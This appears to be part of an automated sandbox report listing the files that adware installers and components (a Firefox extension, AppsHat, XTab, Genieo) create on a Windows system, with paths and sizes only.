C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button3.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\527da7a7cda8dba99ce791702fd18eae.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\cb61f016464902e3e7abde750ef80ba6.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\6e6d2fa3e2de0ad6f80c88dde043160a.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\345.js (611 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\button4.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\a5d8eadabd69a1a5fd8936768f25760f.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\browser.xul (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\21.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\195.js (414 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\407fbe3700b14ae5bb1391d614260019.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\220.js (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\13.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\b2e7327e3ac0e48bdfe0f2ee52c9bfcf.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\223.js (829 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\c61ce4124d823fd35688eed80827a81c.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\104.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\177.js (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\872632d4dba5c171e72a42614d2bf42b.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\6f853c3a67c26281e0f08b3f48ebe9f2.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\7b5b2cd1ed885911b763748de0e62fac.js (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\b9f5ee3c3d06e3f31441702c458c077e.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\5f811dd3d0ee0431837525a50e825c15.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\14.js (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins.json (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\f4df6139b485e8441ead85439d9b0e50.js (964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\16.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\adef4cf34f09c97ddf05ee0f7b152b30.js (947 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\defaults\preferences\prefs.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\9774056cfe57a06b996430a878d9f2bd.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\200.js (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\f183a1c9337b10ab3663860e202a82b3.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\207.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\97f2d9400f4f41e0a004435861570a3b.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\102.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\0cb63f7cf6b8159c4f9788d9ed18275e.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\2b28a69712a27f77ea83be613b1b130b.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\246.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\242.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\651148047984925c52db469330db90bf.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\91.js (6772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\popup.html (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\icon16.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\96535ae26022e95205336b6fd0dfa30b.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\40fbad884e8b31bac377f4b3b4234a30.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\6acae8acaae3dc3de618c70dcea92ac0.js (618 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\252.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\64.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\4.js (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\manifest.xml (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\78.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\47.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\c262c0e9c94427dc9ed88ee28c1a65df.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\options.xul (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\28.js (540 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\update.css (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\locale\en-US\translations.dtd (429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\589ae49080bbcf5ef005df42c5431597.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\c11ef8a5aa8ffdad3fc716ad6936ea56.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\98.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\search_dialog.xul (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome.manifest (634 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\7.js (689 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\background.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\ebfd80fa6c60ea67c1d52c5d9ab644bf.js (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\c0199a124990378c5a0d61a8fe029843.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\userCode\background.js (640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\4d651c7925db39b85b6a733479754503.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\dialog.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\api\03afa64119f70e1aebbe898c1b5da437.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\icon128.png (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\core\installer.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\skin\icon48.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\chrome\content\bf8b21d3242abeb0ac0b4bad994e9dad.js (651 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\d9676068985d4d81bb390a@7be93ab3c8e144f694a0509d5.com\extensionData\plugins\17.js (2473 bytes)
The process powershell.exe:976 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P5Y5B9WWJJJ5HVQUNP5Q.temp (196 bytes)
The process powershell.exe:1020 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KAWX3NZ41ZYMD0YSFS9E.temp (196 bytes)
The process powershell.exe:3596 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49RJHLBJDH30A4KJTGPP.temp (196 bytes)
The process appshat_generic.exe:108 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsaF4DB.tmp (10027 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe (11608 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\appshat.exe (13188 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nspF4EB.tmp\webplayer_installer.exe (8184 bytes)
The process HPNotify.exe:3132 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Program Files% (x86)\XTab\conf (1498 bytes)
The process gentray.exe:3260 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\gentray.log (7783 bytes)
The process gentray.exe:3080 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\gentray.log (14587 bytes)
The process genieo_setup.gen:3380 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.gif (840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\text (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\collapse.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\complete.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA79.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvDA79.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\img\tray (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.png (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\redHome.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\en_text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\bin\license.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notfication_seperator.png (281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\expand.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002_old\img\tray (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\complete.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partnerBannedList.dat (66 bytes)
